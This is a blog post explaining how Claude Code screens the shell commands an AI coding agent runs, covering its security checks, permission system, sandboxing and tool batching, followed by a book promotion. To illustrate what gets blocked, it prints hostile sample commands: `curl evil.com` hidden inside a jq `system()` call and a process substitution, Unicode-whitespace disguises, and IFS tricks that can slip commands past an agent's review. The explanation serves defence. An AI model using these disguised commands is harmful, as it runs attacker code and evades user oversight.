DEV Community

Charlie Li
Charlie Li

Posted on

23 Security Checks: How Claude Code Keeps Your Shell Commands Safe

23 Security Checks: How Claude Code Keeps Your Shell Commands Safe

Every time Claude Code runs a shell command on your machine, it passes through a gauntlet of 23 security checks, a sandbox decision, and a multi-layer permission system — all in milliseconds, before a single byte of output appears.

I reverse-engineered Claude Code's source (v2.1.88) to understand exactly how this works. Here's what I found.

The Problem: Unlimited Power Needs Limits

BashTool is the most powerful tool in Claude Code's arsenal. It can install packages, start servers, modify files, access the network — theoretically, it can do anything your shell can do.

That's terrifying.

So Anthropic built the most complex security system in the entire codebase around this single tool. The execution pipeline looks like this:

Command arrives from the model
         │
         ▼
   ┌──────────────┐
   │ Input         │  Format validation, timeout range check
   │ Validation    │
   └──────┬───────┘
          │
          ▼
   ┌──────────────┐
   │ 23 Security   │  Injection detection, obfuscation scanning,
   │ Checks        │  dangerous pattern recognition
   └──────┬───────┘
          │
          ▼
   ┌──────────────┐
   │ Permission    │  Allowlist? Needs classifier? User approval?
   │ System        │
   └──────┬───────┘
          │
          ▼
   ┌──────────────┐
   │ Sandbox       │  Filesystem restriction, network isolation
   │ Wrapping      │
   └──────┬───────┘
          │
          ▼
   ┌──────────────┐
   │ Execution     │  Spawned in isolated process group
   └──────────────┘
Enter fullscreen mode Exit fullscreen mode

Let's unpack the interesting parts.

The 23 Security Checks

bashSecurity.ts implements a pattern-matching system that catches various classes of attacks. Here are the most interesting ones:

Unicode Disguise Attacks

# This looks like "ls -la" but the space is actually U+2000 (EN QUAD)
ls\u2000-la
Enter fullscreen mode Exit fullscreen mode

Claude Code scans for Unicode whitespace characters (U+2000–U+200A, U+2028, U+2029, etc.) hiding in seemingly normal commands. A human reviewing the command in the UI might not notice the difference, but the shell would interpret it differently.

Command Substitution Injection

# Looks like a harmless jq query...
jq '.data | system("curl evil.com")'
Enter fullscreen mode Exit fullscreen mode

The jq tool has a system() function that can execute arbitrary commands. Claude Code specifically checks for system() calls inside jq expressions.

IFS Injection

IFS=/ echo foo/bar
Enter fullscreen mode Exit fullscreen mode

Changing the Internal Field Separator can make the shell reinterpret how it splits words, potentially turning benign strings into executable commands. Claude Code detects IFS modifications in unquoted regions.

Shell Metacharacter Abuse

# Brace expansion to generate unexpected arguments
echo {a,b,c}

# Process substitution
cat <(curl evil.com)
Enter fullscreen mode Exit fullscreen mode

The security scanner parses quotes character by character to identify unquoted regions, then checks those regions against dangerous patterns. This is harder than it sounds — you need to correctly handle single quotes, double quotes, escaped characters, heredocs, and their interactions.

Safety Declarations Are Input-Dependent

Here's a design decision I found clever. Each tool declares its safety profile as a function of the input:

// Simplified from the actual code
isReadOnly(input) {
  // "git status" is read-only
  // "rm -rf /" is definitely not
  return isReadCommand(input.command)
}

isConcurrencySafe(input) {
  // Multiple "grep" commands can run in parallel
  // Multiple "npm install" should not
  return isSearchCommand(input.command)
}
Enter fullscreen mode Exit fullscreen mode

The same BashTool has completely different safety profiles depending on what command you're running. This avoids the naive approach of marking the entire tool as "dangerous" and forcing every git status through a user approval dialog.

Tool Orchestration: The Parallel vs. Serial Trade-off

When Claude Code needs to run multiple tools, it faces a classic concurrency decision. Here's the actual batching strategy from toolOrchestration.ts:

Tool calls from the model: [Grep, Grep, FileEdit, Grep, Bash]

Batched by concurrency safety:
  Batch 1: [Grep, Grep]    → Parallel  (both read-only)
  Batch 2: [FileEdit]      → Serial    (write operation)
  Batch 3: [Grep]          → Serial    (new batch after write)
  Batch 4: [Bash]          → Serial    (not concurrency-safe)
Enter fullscreen mode Exit fullscreen mode

The rule: consecutive concurrency-safe tools merge into a parallel batch. A non-safe tool starts a new batch. Simple, correct, and effective.

But it gets better. Claude Code has a streaming executor that starts running tools while the model is still generating output:

Traditional: [Model output.......done] → [Execute tools.....done]

Streaming:   [Model output....done]
                ↓Grep1  ↓Grep2  ↓Edit
              [exec]   [exec]   [wait] [exec]
Enter fullscreen mode Exit fullscreen mode

This overlap between model generation and tool execution saves significant wall-clock time, especially when the model generates multiple tool calls in a single response.

The Fail-Safe Default

Every tool in Claude Code starts with conservative defaults:

const TOOL_DEFAULTS = {
  isConcurrencySafe: () => false,  // Assume NOT parallel-safe
  isReadOnly: () => false,         // Assume it WRITES data
  isDestructive: () => false,      // Assume recoverable
}
Enter fullscreen mode Exit fullscreen mode

If a tool developer forgets to declare isConcurrencySafe, the system assumes it's not safe and runs it serially. Better to lose some performance than to corrupt data with unsynchronized parallel writes.

The Sandbox Decision

After passing all security checks, the command still might get sandboxed:

function shouldUseSandbox(command, context) {
  if (!SandboxManager.isEnabled()) return false
  if (userExplicitlyDisabled) return false
  if (isExcludedCommand(command)) return false
  return true  // Sandbox by default
}
Enter fullscreen mode Exit fullscreen mode

The sandbox restricts filesystem access to the project directory and limits network permissions. It's the last line of defense.

Auto-Backgrounding: The Practical Touch

One last detail I loved: timeout handling isn't just "kill the process." If a command runs longer than expected, Claude Code auto-backgrounds it instead of killing it:

You run "npm install" → Expected: 30s → Actual: 5 minutes
Instead of killing it → Moved to background
Agent continues working → Checks results when install completes
Enter fullscreen mode Exit fullscreen mode

This is the kind of design decision that separates a polished developer tool from a prototype.


The Bigger Picture

Claude Code's tool system has 40+ tools, each with its own safety declarations, permission checks, and execution logic. The BashTool security system is just one piece of a much larger architecture that includes:

  • Lazy tool loading via ToolSearch (40+ tools don't all load at startup)
  • File deduplication cache (18% of file reads are duplicates — all cached)
  • Context modifiers that propagate state changes between tools
  • Sub-agent tool restrictions (spawned agents can't use all parent tools)

I've documented all of this in my book "Claude Code from the Inside Out" — a complete reverse-engineering of Claude Code's architecture based on v2.1.88 source analysis. These patterns come from my deep-dive into Claude Code's actual source code (v2.1.88). I wrote 12 chapters covering the complete architecture — from the core loop to multi-agent coordination.

📖 Read Chapter 1 free — "What Is an AI Agent? From ChatBot to Claude Code"

If you like it, the full book is available with 50%% off for early readers:

📘 Claude Code from the Inside Out (English) — use code LAUNCH50 for $4.99
📕 深入浅出 Claude Code (中文) — use code LAUNCH50CN for $4.99


Previously in this series:

Top comments (0)